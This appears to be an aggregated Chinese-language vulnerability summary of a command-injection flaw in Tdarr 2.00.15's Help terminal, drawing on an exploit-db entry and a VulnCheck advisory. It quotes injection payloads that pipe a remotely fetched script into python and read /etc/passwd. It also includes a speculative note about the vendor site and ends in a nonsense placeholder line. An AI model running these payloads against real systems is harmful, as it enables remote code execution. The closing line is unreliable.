# Tdarr 2.00.15 命令注入漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Tdarr 2.00.15 - Command Injection - Multiple remote Exploit -- 🔗来源链接
标签:exploit
神龙速读:
从该网页截图中可以获取到以下漏洞的关键信息:
- **漏洞标题**: Tdarr 2.00.15 - Command Injection
- **EDB-ID**: 50822
- **CVE**: N/A
- **作者**: Sam Smith
- **漏洞类型**: Remote
- **平台**: Multiple
- **发布日期**: 2022-03-11
- **漏洞应用**: Tdarr
- **验证状态**: 未验证
- **相关链接**:
- 厂商主页: `https://tdarr.io`
- 软件链接: `https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip`
- **漏洞版本范围**: 2.00.15 (可能包括旧版本)
- **测试版本**: 2.00.15
- **漏洞描述**: Tdarr 应用中的 Help 选项卡包含 FFmpeg 和 HandBrake 的终端,但这些终端未包含输入过滤,允许用户连接命令并生成反向Shell。
- **示例攻击命令**:
```
--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.
```
标题: Tdarr -- 🔗来源链接
标签:product
神龙速读:
从提供的截图中,我们看不到任何特定的文本或图像内容,但以下是从网页结构可以推测出的潜在安全相关的观察点:
- **用户界面的可能暗示**:导航栏包含典型的网站元素如"Home"、"Download"、"Docs"等,这暗示了一个可能是软件或服务的官方网站。缺少可见的内容或错误消息可能表明网站处于维护状态,或者存在配置错误。
- **潜在的XSS风险**:如果网站接受用户输入但未正确处理或显示,攻击者可能尝试注入恶意脚本来执行跨站脚本攻击(XSS)。
- **缺少内容的异常**:页面的空白内容可以表明存在服务器端错误,如500 Internal Server Error,这种错误可能暴露服务器的技术细节,为攻击者提供利用信息。
在没有更多上下文或可见内容的情况下,这些只是基于网站结构的理论推测。
---
要准确识别网页中的安全漏洞,需要实际的内容或错误消息,以及对网站后端的了解。
标题: Tdarr 2.00.15 - Command Injection | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
## Tdarr 2.00.15 - Command Injection
### Severity
- Critical
### Date
- January 13, 2026
### Affecting
- Tdarr 2.00.15
### CVE
- CVE-2022-50919 
### CWE
- CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
### CVSS
- CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
### References
- [ExploitDB-50822 ](https://exploitdb.com/exploits/50822)
- [Official Vendor Homepage ](https://tdarr.net)
### Credit
- Sam Smith
### Description
- Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like '--help; curl .py | python' to execute remote code without authentication.
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.